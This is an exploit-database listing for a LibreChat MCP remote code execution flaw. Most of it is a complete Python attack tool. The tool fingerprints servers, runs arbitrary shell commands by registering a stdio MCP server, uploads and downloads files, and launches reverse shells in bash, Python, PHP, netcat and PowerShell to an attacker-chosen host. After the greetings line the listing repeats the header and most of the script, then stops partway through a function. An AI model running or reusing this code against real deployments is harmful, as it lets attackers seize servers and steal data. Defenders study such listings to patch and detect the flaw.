9.9
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Description
This proof of concept exploit targets the LibreChat MCP remote code execution vulnerability known as CVE-2026-22252. It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple...
Basic Information
ID
PACKETSTORM:214609
Published
Jan 30, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : LibreChat MCP 0.8.2-rc2 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.librechat.ai/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252
[+] Summary : exploit targets the LibreChat MCP Remote Code Execution vulnerability (CVE-2026-22252).
It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple extraction modes.
[+] Key Features:
Target Discovery: Detects LibreChat installations, extracts version, OS type, shell, CSRF status, and public writable paths.
MCP Interaction: Checks MCP endpoint availability, determines required permissions, and supports command execution with optional token-based authentication.
Command Execution: Executes system commands safely using multiple extraction modes: direct, file, network, or base64 encoded.
Vulnerability Testing: Performs safe and thorough tests with verification of results.
Interactive Shell: Provides a CLI interface with command history, status display, file upload/download, reverse shell creation, and rate limiting.
Cross-Platform Support: Works on Linux, macOS, and Windows with adaptive shell commands.
Logging & Debugging: Detailed logs saved locally and on-screen, with verbose mode for troubleshooting.
[+] POC :
#!/usr/bin/env python3
import requests
import json
import sys
import re
import time
import argparse
import signal
import os
import random
import string
from typing import Optional, Dict, Any, Tuple, List
from dataclasses import dataclass
from enum import Enum
import logging
from urllib.parse import urljoin, urlparse
from pathlib import Path
import hashlib
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.StreamHandler(),
logging.FileHandler('librechat_exploit.log')
]
)
logger = logging.getLogger(__name__)
class TransportType(Enum):
"""Supported transport types"""
STDIO = "stdio"
SSE = "sse"
HTTP = "http"
class ExploitMode(Enum):
"""Output extraction methods"""
DIRECT = "direct"
FILE = "file"
NETWORK = "network"
ENCODED = "encoded"
@dataclass
class AuthResult:
"""Authentication result"""
success: bool
token: Optional[str] = None
cookies: Optional[Dict] = None
session_id: Optional[str] = None
csrf_token: Optional[str] = None
user_role: str = "user"
permissions: List[str] = None
message: str = ""
@dataclass
class TargetInfo:
"""Target system information"""
is_librechat: bool = False
version: Optional[str] = None
csrf_enabled: bool = False
mcp_available: bool = False
mcp_requires_admin: bool = False
public_paths: List[str] = None
os_type: str = "linux"
shell_type: str = "sh"
class LibreChatExploit:
def __init__(self, target_url: str, timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.timeout = timeout
self.target_info = TargetInfo()
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
})
self.auth_result = AuthResult(success=False, permissions=[])
self.csrf_token = None
def _extract_csrf_token(self, response_text: str) -> Optional[str]:
"""Extract CSRF token from HTML or JSON"""
patterns = [
r'name="csrfToken" value="([^"]+)"',
r'"csrfToken":"([^"]+)"',
r'window\.csrfToken = "([^"]+)"',
r'<meta name="csrf-token" content="([^"]+)"',
]
for pattern in patterns:
match = re.search(pattern, response_text)
if match:
return match.group(1)
if 'csrf_token' in self.session.cookies:
return self.session.cookies.get('csrf_token')
return None
def _generate_random_string(self, length: int = 8) -> str:
"""Generate random string"""
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def _detect_public_paths(self) -> List[str]:
"""Detect available public paths"""
common_public_paths = [
'/images/',
'/public/',
'/static/',
'/assets/',
'/uploads/',
'/media/',
'/files/',
'/downloads/',
]
available_paths = []
for path in common_public_paths:
try:
response = self.session.get(
urljoin(self.target_url, path),
timeout=5,
allow_redirects=False
)
if response.status_code in [200, 301, 302, 403]:
available_paths.append(path)
logger.debug(f"Found public path: {path}")
except Exception as e:
logger.debug(f"Path check {path} failed: {e}")
continue
return available_paths
def _detect_os_and_shell(self) -> Tuple[str, str]:
"""Detect operating system and shell type"""
os_type = "linux"
shell_type = "sh"
return os_type, shell_type
def check_target(self) -> Tuple[bool, str]:
"""Comprehensive target check"""
try:
response = self.session.get(
self.target_url,
timeout=self.timeout
)
if response.status_code != 200:
return False, f"Server unavailable (HTTP {response.status_code})"
html_content = response.text
librechat_indicators = [
'LibreChat',
'librechat',
'Evo',
'next/head',
'authToken',
'conversationId',
]
is_librechat = any(indicator.lower() in html_content.lower()
for indicator in librechat_indicators)
if not is_librechat:
return False, "This may not be a LibreChat server"
self.target_info.is_librechat = True
version_patterns = [
r'"version":"([^"]+)"',
r'librechat-([\d\.]+)',
r'v(\d+\.\d+\.\d+)',
r'Version\s+([\d\.]+)',
]
for pattern in version_patterns:
match = re.search(pattern, html_content, re.IGNORECASE)
if match:
self.target_info.version = match.group(1)
break
self.csrf_token = self._extract_csrf_token(html_content)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
self.target_info.csrf_enabled = True
self.target_info.public_paths = self._detect_public_paths()
self.target_info.os_type, self.target_info.shell_type = self._detect_os_and_shell()
return True, f"LibreChat {self.target_info.version if self.target_info.version else 'unknown'}"
except requests.RequestException as e:
return False, f"Connection error: {e}"
except Exception as e:
logger.error(f"Unexpected error in target check: {e}")
return False, f"Check error: {e}"
def _get_user_permissions(self) -> List[str]:
"""Get user permissions"""
permissions = []
check_endpoints = [
('/api/admin', 'admin_access'),
('/api/mcp/servers', 'mcp_access'),
('/api/users', 'user_management'),
('/api/settings', 'settings_access'),
]
for endpoint, perm_name in check_endpoints:
try:
url = urljoin(self.target_url, endpoint)
response = self.session.get(url, timeout=10)
if response.status_code == 200:
permissions.append(perm_name)
elif response.status_code == 403:
permissions.append(f"{perm_name}_denied")
elif response.status_code == 404:
pass
except Exception as e:
logger.debug(f"Permission check {perm_name} failed: {e}")
return permissions
def check_mcp_endpoint(self) -> Tuple[bool, str]:
"""Check MCP endpoint and permissions"""
mcp_url = urljoin(self.target_url, '/api/mcp/servers')
try:
response = self.session.get(mcp_url, timeout=self.timeout)
if response.status_code == 401:
logger.debug("MCP requires authentication")
elif response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Requires admin privileges"
elif response.status_code == 404:
alt_paths = ['/api/v1/mcp/servers', '/api/v2/mcp/servers', '/mcp/api/servers']
for path in alt_paths:
alt_url = urljoin(self.target_url, path)
try:
alt_response = self.session.get(alt_url, timeout=5)
if alt_response.status_code < 400:
mcp_url = alt_url
break
except:
continue
if self.auth_result.success:
headers = {}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"
response = self.session.get(mcp_url, headers=headers, timeout=self.timeout)
if response.status_code == 200:
self.target_info.mcp_available = True
try:
test_payload = {
"config": {
"type": "stdio",
"title": "permission_test",
"command": "echo",
"args": ["test"]
}
}
test_response = self.session.post(
mcp_url,
json=test_payload,
headers=headers,
timeout=self.timeout
)
if test_response.status_code in [200, 201]:
return True, "Available for read/write"
elif test_response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Requires admin privileges for write"
else:
return True, f"Read only (POST: {test_response.status_code})"
except Exception as e:
logger.debug(f"MCP permission test failed: {e}")
return True, "Available (write test failed)"
elif response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Forbidden - requires higher privileges"
elif response.status_code == 404:
return False, "Endpoint not found"
return False, f"Unknown status: {response.status_code}"
except Exception as e:
logger.error(f"MCP check error: {e}")
return False, f"Connection error: {e}"
def execute_command(self, command: str, exfil_mode: ExploitMode = ExploitMode.DIRECT) -> Tuple[bool, str, Optional[str]]:
"""Execute command with multiple output extraction options"""
if not self.auth_result.success:
return False, "Unauthorized", None
final_command = self._prepare_command(command, exfil_mode)
mcp_url = urljoin(self.target_url, '/api/mcp/servers')
headers = {
"Content-Type": "application/json",
}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token
payload = {
"config": {
"type": "stdio",
"title": f"cmd_{self._generate_random_string()}",
"command": self._get_shell_path(),
"args": ["-c", final_command]
}
}
try:
logger.info(f"Sending command via MCP...")
response = self.session.post(
mcp_url,
json=payload,
headers=headers,
timeout=self.timeout
)
if response.status_code in [200, 201]:
output = self._retrieve_output(command, exfil_mode)
return True, "Command executed successfully", output
else:
error_msg = f"Execution failed: {response.status_code}"
if response.text:
error_msg += f" - {response.text[:200]}"
return False, error_msg, None
except requests.Timeout:
return False, "Timeout - command may still be executing", None
except Exception as e:
logger.error(f"Execution error: {e}")
return False, f"Error: {e}", None
def _prepare_command(self, command: str, exfil_mode: ExploitMode) -> str:
"""Prepare command based on extraction method"""
random_suffix = self._generate_random_string()
if exfil_mode == ExploitMode.DIRECT:
return f"({command}) 2>&1"
elif exfil_mode == ExploitMode.FILE:
temp_file = f"/tmp/cmd_out_{random_suffix}.txt"
return f"({command}) 2>&1 > {temp_file} && echo 'OUTPUT_SAVED:{temp_file}'"
elif exfil_mode == ExploitMode.NETWORK:
return f"({command}) 2>&1 | base64"
elif exfil_mode == ExploitMode.ENCODED:
return f"echo 'START_OUTPUT' && ({command}) 2>&1 | base64 -w0 && echo 'END_OUTPUT'"
return f"({command}) 2>&1"
def _get_shell_path(self) -> str:
"""Get appropriate shell path"""
if self.target_info.os_type == "windows":
return "cmd.exe"
elif self.target_info.shell_type == "bash":
return "/bin/bash"
else:
return "/bin/sh"
def _retrieve_output(self, original_command: str, exfil_mode: ExploitMode) -> Optional[str]:
"""Retrieve command output"""
output = None
try:
if exfil_mode == ExploitMode.DIRECT:
pass
elif exfil_mode == ExploitMode.FILE:
find_cmd = f"find /tmp -name '*cmd_out_*.txt' -mmin -1 2>/dev/null | head -5"
success, files_output = self._execute_simple_command(find_cmd)
if success and files_output:
for line in files_output.split('\n'):
if line.strip():
read_cmd = f"cat {line.strip()} 2>/dev/null && rm -f {line.strip()}"
success, content = self._execute_simple_command(read_cmd)
if success:
output = content
break
elif exfil_mode == ExploitMode.ENCODED:
log_cmds = [
"dmesg | tail -20 2>/dev/null",
"journalctl --no-pager -n 20 2>/dev/null",
"cat /var/log/syslog 2>/dev/null | tail -20",
]
for log_cmd in log_cmds:
success, log_output = self._execute_simple_command(log_cmd)
if success and "START_OUTPUT" in log_output:
start = log_output.find("START_OUTPUT") + len("START_OUTPUT")
end = log_output.find("END_OUTPUT")
if end > start:
encoded = log_output[start:end].strip()
try:
import base64
output = base64.b64decode(encoded).decode('utf-8', errors='ignore')
except:
output = encoded
break
except Exception as e:
logger.debug(f"Output retrieval failed: {e}")
return output
def _execute_simple_command(self, command: str) -> Tuple[bool, str]:
"""Execute simple command (for extraction)"""
try:
success, msg, output = self.execute_command(
command,
exfil_mode=ExploitMode.ENCODED
)
return success, output if output else ""
except:
return False, ""
def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:
"""Test vulnerability accurately and safely"""
test_id = self._generate_random_string(12)
test_file = f"/tmp/librechat_test_{test_id}.txt"
test_command = f"""
echo "=== TEST START {test_id} ===" &&
id &&
echo "---" &&
whoami &&
echo "---" &&
pwd &&
echo "---" &&
uname -a &&
echo "=== TEST END {test_id} ==="
"""
logger.info(f"Testing vulnerability (ID: {test_id})...")
for exfil_mode in [ExploitMode.ENCODED, ExploitMode.FILE, ExploitMode.DIRECT]:
logger.debug(f"Trying method: {exfil_mode.value}")
success, message, output = self.execute_command(test_command, exfil_mode)
if success:
logger.info(f"[ok] Execution successful with {exfil_mode.value}")
if output:
if test_id in output:
logger.info(f"[ok] Results verified")
return True, f"Vulnerability exists and exploitable (method: {exfil_mode.value})", output
else:
logger.debug("Results don't contain expected identifier")
return True, f"Vulnerability exists (execution successful)", output
time.sleep(1)
file_test_command = f"echo 'VULN_TEST_{test_id}' > {test_file}"
check_command = f"cat {test_file} 2>/dev/null && rm -f {test_file}"
success1, msg1, _ = self.execute_command(file_test_command, ExploitMode.DIRECT)
time.sleep(1)
success2, msg2, output = self.execute_command(check_command, ExploitMode.ENCODED)
if success1 and success2 and output and f"VULN_TEST_{test_id}" in output:
return True, "Vulnerability exists (file test successful)", output
return False, "Vulnerability not found or not exploitable", None
class InteractiveExploitShell:
"""Enhanced interactive interface"""
def __init__(self, exploit: LibreChatExploit):
self.exploit = exploit
self.running = True
self.command_history = []
self.session_id = hashlib.md5(str(time.time()).encode()).hexdigest()[:8]
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGTERM, self._signal_handler)
self.rate_limit = 1.0
self.last_command_time = 0
self.output_mode = ExploitMode.ENCODED
def _signal_handler(self, signum, frame):
"""Handle system signals"""
logger.info(f"\n[!] Received signal {signum} - safe termination...")
self.running = False
def _check_rate_limit(self):
"""Check rate limiting"""
current_time = time.time()
time_since_last = current_time - self.last_command_time
if time_since_last < self.rate_limit:
sleep_time = self.rate_limit - time_since_last
logger.debug(f"Rate limiting: wait {sleep_time:.2f} seconds")
time.sleep(sleep_time)
def _cleanup_temp_files(self):
"""Clean up temporary files if possible"""
cleanup_cmd = "find /tmp -name '*librechat_*' -mmin +5 -delete 2>/dev/null"
self.exploit.execute_command(cleanup_cmd, ExploitMode.DIRECT)
def run(self):
"""Run interactive interface"""
print(f"\n{'='*60}")
print(f"LibreChat MCP RCE - Session: {self.session_id}")
print(f"Target: {self.exploit.target_url}")
print(f"User: {self.exploit.auth_result.user_role}")
print(f"{'='*60}")
print("Type 'help' for full menu")
while self.running:
try:
self._check_rate_limit()
prompt = f"\nexploit[{self.session_id}]> "
try:
cmd = input(prompt).strip()
except (EOFError, KeyboardInterrupt):
print("\n[*] Ending session...")
break
if not cmd:
continue
self.last_command_time = time.time()
self.command_history.append(cmd)
if len(self.command_history) > 50:
self.command_history.pop(0)
if self._handle_special_commands(cmd):
continue
self._execute_user_command(cmd)
except Exception as e:
logger.error(f"Interactive interface error: {e}")
time.sleep(0.5)
self._cleanup_temp_files()
print(f"\n[*] Ending session {self.session_id}")
def _handle_special_commands(self, cmd: str) -> bool:
"""Handle special commands"""
cmd_lower = cmd.lower().strip()
if cmd_lower == 'exit' or cmd_lower == 'quit':
self.running = False
return True
elif cmd_lower == 'help':
self._show_help()
return True
elif cmd_lower == 'history':
self._show_history()
return True
elif cmd_lower == 'status':
self._show_status()
return True
elif cmd_lower == 'mode':
self._change_output_mode()
return True
elif cmd_lower == 'clear':
os.system('clear' if os.name != 'nt' else 'cls')
return True
elif cmd_lower.startswith('shell '):
self._handle_reverse_shell(cmd)
return True
elif cmd_lower.startswith('upload '):
self._handle_file_upload(cmd)
return True
elif cmd_lower.startswith('download '):
self._handle_file_download(cmd)
return True
return False
def _show_help(self):
"""Show help menu"""
help_text = """
╔══════════════════════════════════════════════════════════╗
║ LibreChat RCE Commands by indoushka ║
╚══════════════════════════════════════════════════════════╝
Basic Commands:
help Show this menu
exit / quit Exit session
status Show system status
history Show command history
clear Clear screen
mode Change output display method
Advanced Commands:
shell [LHOST] [LPORT] Create reverse shell
upload [local] [remote] Upload file
download [remote] [local] Download file
System Exploration:
pwd Current directory
ls [path] List files
cat [file] Show file content
Information Gathering:
id User information
whoami Username
uname -a System info
ps aux Running processes
Note: Use ';' to separate multiple commands
"""
print(help_text)
def _show_history(self):
"""Show command history"""
if not self.command_history:
print("[*] No commands in history")
return
print("\nCommand History (newest first):")
print("-" * 50)
for i, cmd in enumerate(reversed(self.command_history[-10:]), 1):
print(f"{i:2d}. {cmd[:60]}{'...' if len(cmd) > 60 else ''}")
print("-" * 50)
def _show_status(self):
"""Show system status"""
print(f"\n{'='*50}")
print("System Status:")
print(f"{'='*50}")
print(f"Target: {self.exploit.target_url}")
print(f"Version: {self.exploit.target_info.version or 'unknown'}")
print(f"User: {self.exploit.auth_result.user_role}")
print(f"OS: {self.exploit.target_info.os_type}")
print(f"Shell: {self.exploit.target_info.shell_type}")
print(f"CSRF: {'enabled' if self.exploit.target_info.csrf_enabled else 'disabled'}")
print(f"MCP: {'available' if self.exploit.target_info.mcp_available else 'unavailable'}")
print(f"Requires admin: {'yes' if self.exploit.target_info.mcp_requires_admin else 'no'}")
print(f"Output method: {self.output_mode.value}")
print(f"{'='*50}")
def _change_output_mode(self):
"""Change output display method"""
modes = list(ExploitMode)
print("\nAvailable output methods:")
for i, mode in enumerate(modes, 1):
print(f" {i}. {mode.value}")
try:
choice = input("\nChoose number [1-4]: ").strip()
if choice.isdigit() and 1 <= int(choice) <= len(modes):
self.output_mode = modes[int(choice) - 1]
print(f"[ok] Changed to: {self.output_mode.value}")
else:
print("[!] Invalid choice")
except:
print("[!] Choice error")
def _handle_reverse_shell(self, cmd: str):
"""Handle reverse shell command"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: shell [LHOST] [LPORT]")
return
lhost = parts[1]
lport = parts[2]
if not lport.isdigit():
print("[!] Port must be a number")
return
print(f"\n[*] Preparing reverse shell to {lhost}:{lport}")
print("[*] Make sure listener is running:")
print(f" nc -lvnp {lport}")
print("\n[*] Attempting...")
shells = []
if self.exploit.target_info.os_type == "linux":
shells = [
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
f"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
f"php -r '$s=fsockopen(\"{lhost}\",{lport});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
f"nc -e /bin/sh {lhost} {lport}",
]
elif self.exploit.target_info.os_type == "windows":
shells = [
f"powershell -c \"$c=New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+'PS '+(pwd).Path+'> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()}};$c.Close()\"",
]
for i, shell_cmd in enumerate(shells, 1):
print(f"\n[*] Trying shell #{i}...")
success, message, _ = self.exploit.execute_command(shell_cmd, self.output_mode)
if success:
print(f"[ok] Shell sent successfully")
print("[*] Wait 5 seconds for connection...")
time.sleep(5)
break
else:
print(f"[no] Failed: {message}")
def _handle_file_upload(self, cmd: str):
"""Upload file to server"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: upload [local file] [remote path]")
return
local_file = parts[1]
remote_path = parts[2]
if not os.path.exists(local_file):
print(f"[!] Local file not found: {local_file}")
return
try:
with open(local_file, 'rb') as f:
content = f.read()
import base64
encoded_content = base64.b64encode(content).decode('utf-8')
upload_cmd = f"""
echo '{encoded_content}' | base64 -d > "{remote_path}" &&
echo "UPLOAD_SUCCESS: {remote_path}" ||
echo "UPLOAD_FAILED"
"""
print(f"[*] Uploading {local_file} to {remote_path}...")
success, message, output = self.exploit.execute_command(upload_cmd, self.output_mode)
if success and output and "UPLOAD_SUCCESS" in output:
print(f"[ok] File uploaded successfully")
else:
print(f"[no] Upload failed: {message}")
except Exception as e:
print(f"[no] Upload error: {e}")
def _handle_file_download(self, cmd: str):
"""Download file from server"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: download [remote path] [local file]")
return
remote_path = parts[1]
local_file = parts[2]
download_cmd = f"""
if [ -f "{remote_path}" ]; then
cat "{remote_path}" | base64 -w0;
echo "";
else
echo "FILE_NOT_FOUND";
fi
"""
print(f"[*] Downloading {remote_path} to {local_file}...")
success, message, output = self.exploit.execute_command(download_cmd, ExploitMode.ENCODED)
if success and output and output.strip() and "FILE_NOT_FOUND" not in output:
try:
import base64
content = base64.b64decode(output.strip())
with open(local_file, 'wb') as f:
f.write(content)
print(f"[ok] Downloaded successfully ({len(content)} bytes)")
except Exception as e:
print(f"[no] Decryption error: {e}")
else:
print(f"[no] Download failed: {message}")
def _execute_user_command(self, cmd: str):
"""Execute user command"""
print(f"[*] Executing...")
start_time = time.time()
success, message, output = self.exploit.execute_command(cmd, self.output_mode)
elapsed = time.time() - start_time
if success:
print(f"[ok] Executed ({elapsed:.2f} seconds)")
if output and output.strip():
print(f"\n{'='*50}")
print("Output:")
print(f"{'='*50}")
print(output[:5000])
if len(output) > 5000:
print(f"\n[...] Output truncated ({len(output)} chars)")
print(f"{'='*50}")
else:
print(f"[no] Failed: {message}")
def main():
parser = argparse.ArgumentParser(
description='LibreChat MCP RCE Exploit - Final Version',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -u http://localhost:3080 --check
%(prog)s -u http://target.com --test
%(prog)s -u http://target.com -c "id"
%(prog)s -u http://target.com --interactive
Warning: For legal and ethical use only.
Written authorization required before testing any system.
"""
)
parser.add_argument('-u', '--url', required=True,
help='Target URL (e.g., http://localhost:3080)')
parser.add_argument('-c', '--command',
help='Command to execute')
parser.add_argument('-f', '--command-file',
help='File containing commands to execute')
parser.add_argument('--test', action='store_true',
help='Test vulnerability only')
parser.add_argument('--check', action='store_true',
help='Check system only')
parser.add_argument('--interactive', action='store_true',
help='Interactive mode')
parser.add_argument('--username', default='test_user',
help='Username (default: test_user)')
parser.add_argument('--password', default='Test12345!',
help='Password (default: Test12345!)')
parser.add_argument('--email', default='[email protected]',
help='Email (default: [email protected])')
parser.add_argument('--timeout', type=int, default=30,
help='Timeout in seconds (default: 30)')
parser.add_argument('--verbose', '-v', action='store_true',
help='Show detailed information')
parser.add_argument('--output-mode', choices=['direct', 'file', 'encoded'],
default='encoded', help='Output extraction method')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
print("="*60)
print("LibreChat MCP RCE Exploit by indoushka")
print("CVE-2026-22252")
print("="*60)
try:
exploit = LibreChatExploit(args.url, args.timeout)
print("[*] Checking target system...")
target_ok, target_msg = exploit.check_target()
if not target_ok:
print(f"[no] {target_msg}")
sys.exit(1)
print(f"[ok] {target_msg}")
print(f"\n[*] System Information:")
print(f" - Version: {exploit.target_info.version or 'unknown'}")
print(f" - OS: {exploit.target_info.os_type}")
print(f" - Shell: {exploit.target_info.shell_type}")
print(f" - CSRF: {'enabled' if exploit.target_info.csrf_enabled else 'disabled'}")
if exploit.target_info.public_paths:
print(f" - Public paths: {', '.join(exploit.target_info.public_paths)}")
print("\n[*] Checking MCP endpoint...")
mcp_ok, mcp_msg = exploit.check_mcp_endpoint()
print(f"[*] MCP: {mcp_msg}")
if not mcp_ok and "requires authentication" not in mcp_msg:
print(f"[!] Warning: {mcp_msg}")
if not args.interactive:
sys.exit(1)
if args.check:
sys.exit(0)
if args.test:
print("\n[*] Testing vulnerability...")
vulnerable, vuln_msg, output = exploit.test_vulnerability()
if vulnerable:
print(f"[ok] {vuln_msg}")
if output:
print(f"\n[+] Sample output:\n{output[:500]}")
else:
print(f"[no] {vuln_msg}")
sys.exit(0)
if args.command:
output_mode = ExploitMode(args.output_mode)
print(f"\n[*] Executing command: {args.command}")
success, message, output = exploit.execute_command(args.command, output_mode)
if success:
print(f"[ok] {message}")
if output:
print(f"\n[+] Output:\n{output}")
else:
print(f"[no] {message}")
elif args.interactive:
shell = InteractiveExploitShell(exploit)
shell.run()
else:
print("\n[!] No action specified. Use --help for help")
except KeyboardInterrupt:
print("\n\n[*] Interrupted by user")
sys.exit(0)
except Exception as e:
logger.error(f"Unexpected error: {e}")
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
| # Title : LibreChat MCP 0.8.2-rc2 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.librechat.ai/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252
[+] Summary : exploit targets the LibreChat MCP Remote Code Execution vulnerability (CVE-2026-22252).
It provides a comprehensive and professional framework for detecting, testing, and exploiting the vulnerability with multiple extraction modes.
[+] Key Features:
Target Discovery: Detects LibreChat installations, extracts version, OS type, shell, CSRF status, and public writable paths.
MCP Interaction: Checks MCP endpoint availability, determines required permissions, and supports command execution with optional token-based authentication.
Command Execution: Executes system commands safely using multiple extraction modes: direct, file, network, or base64 encoded.
Vulnerability Testing: Performs safe and thorough tests with verification of results.
Interactive Shell: Provides a CLI interface with command history, status display, file upload/download, reverse shell creation, and rate limiting.
Cross-Platform Support: Works on Linux, macOS, and Windows with adaptive shell commands.
Logging & Debugging: Detailed logs saved locally and on-screen, with verbose mode for troubleshooting.
[+] POC :
#!/usr/bin/env python3
import requests
import json
import sys
import re
import time
import argparse
import signal
import os
import random
import string
from typing import Optional, Dict, Any, Tuple, List
from dataclasses import dataclass
from enum import Enum
import logging
from urllib.parse import urljoin, urlparse
from pathlib import Path
import hashlib
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.StreamHandler(),
logging.FileHandler('librechat_exploit.log')
]
)
logger = logging.getLogger(__name__)
class TransportType(Enum):
"""Supported transport types"""
STDIO = "stdio"
SSE = "sse"
HTTP = "http"
class ExploitMode(Enum):
"""Output extraction methods"""
DIRECT = "direct"
FILE = "file"
NETWORK = "network"
ENCODED = "encoded"
@dataclass
class AuthResult:
"""Authentication result"""
success: bool
token: Optional[str] = None
cookies: Optional[Dict] = None
session_id: Optional[str] = None
csrf_token: Optional[str] = None
user_role: str = "user"
permissions: List[str] = None
message: str = ""
@dataclass
class TargetInfo:
"""Target system information"""
is_librechat: bool = False
version: Optional[str] = None
csrf_enabled: bool = False
mcp_available: bool = False
mcp_requires_admin: bool = False
public_paths: List[str] = None
os_type: str = "linux"
shell_type: str = "sh"
class LibreChatExploit:
def __init__(self, target_url: str, timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.timeout = timeout
self.target_info = TargetInfo()
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
})
self.auth_result = AuthResult(success=False, permissions=[])
self.csrf_token = None
def _extract_csrf_token(self, response_text: str) -> Optional[str]:
"""Extract CSRF token from HTML or JSON"""
patterns = [
r'name="csrfToken" value="([^"]+)"',
r'"csrfToken":"([^"]+)"',
r'window\.csrfToken = "([^"]+)"',
r'<meta name="csrf-token" content="([^"]+)"',
]
for pattern in patterns:
match = re.search(pattern, response_text)
if match:
return match.group(1)
if 'csrf_token' in self.session.cookies:
return self.session.cookies.get('csrf_token')
return None
def _generate_random_string(self, length: int = 8) -> str:
"""Generate random string"""
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def _detect_public_paths(self) -> List[str]:
"""Detect available public paths"""
common_public_paths = [
'/images/',
'/public/',
'/static/',
'/assets/',
'/uploads/',
'/media/',
'/files/',
'/downloads/',
]
available_paths = []
for path in common_public_paths:
try:
response = self.session.get(
urljoin(self.target_url, path),
timeout=5,
allow_redirects=False
)
if response.status_code in [200, 301, 302, 403]:
available_paths.append(path)
logger.debug(f"Found public path: {path}")
except Exception as e:
logger.debug(f"Path check {path} failed: {e}")
continue
return available_paths
def _detect_os_and_shell(self) -> Tuple[str, str]:
"""Detect operating system and shell type"""
os_type = "linux"
shell_type = "sh"
return os_type, shell_type
def check_target(self) -> Tuple[bool, str]:
"""Comprehensive target check"""
try:
response = self.session.get(
self.target_url,
timeout=self.timeout
)
if response.status_code != 200:
return False, f"Server unavailable (HTTP {response.status_code})"
html_content = response.text
librechat_indicators = [
'LibreChat',
'librechat',
'Evo',
'next/head',
'authToken',
'conversationId',
]
is_librechat = any(indicator.lower() in html_content.lower()
for indicator in librechat_indicators)
if not is_librechat:
return False, "This may not be a LibreChat server"
self.target_info.is_librechat = True
version_patterns = [
r'"version":"([^"]+)"',
r'librechat-([\d\.]+)',
r'v(\d+\.\d+\.\d+)',
r'Version\s+([\d\.]+)',
]
for pattern in version_patterns:
match = re.search(pattern, html_content, re.IGNORECASE)
if match:
self.target_info.version = match.group(1)
break
self.csrf_token = self._extract_csrf_token(html_content)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
self.target_info.csrf_enabled = True
self.target_info.public_paths = self._detect_public_paths()
self.target_info.os_type, self.target_info.shell_type = self._detect_os_and_shell()
return True, f"LibreChat {self.target_info.version if self.target_info.version else 'unknown'}"
except requests.RequestException as e:
return False, f"Connection error: {e}"
except Exception as e:
logger.error(f"Unexpected error in target check: {e}")
return False, f"Check error: {e}"
def _get_user_permissions(self) -> List[str]:
"""Get user permissions"""
permissions = []
check_endpoints = [
('/api/admin', 'admin_access'),
('/api/mcp/servers', 'mcp_access'),
('/api/users', 'user_management'),
('/api/settings', 'settings_access'),
]
for endpoint, perm_name in check_endpoints:
try:
url = urljoin(self.target_url, endpoint)
response = self.session.get(url, timeout=10)
if response.status_code == 200:
permissions.append(perm_name)
elif response.status_code == 403:
permissions.append(f"{perm_name}_denied")
elif response.status_code == 404:
pass
except Exception as e:
logger.debug(f"Permission check {perm_name} failed: {e}")
return permissions
def check_mcp_endpoint(self) -> Tuple[bool, str]:
"""Check MCP endpoint and permissions"""
mcp_url = urljoin(self.target_url, '/api/mcp/servers')
try:
response = self.session.get(mcp_url, timeout=self.timeout)
if response.status_code == 401:
logger.debug("MCP requires authentication")
elif response.status_code == 403:
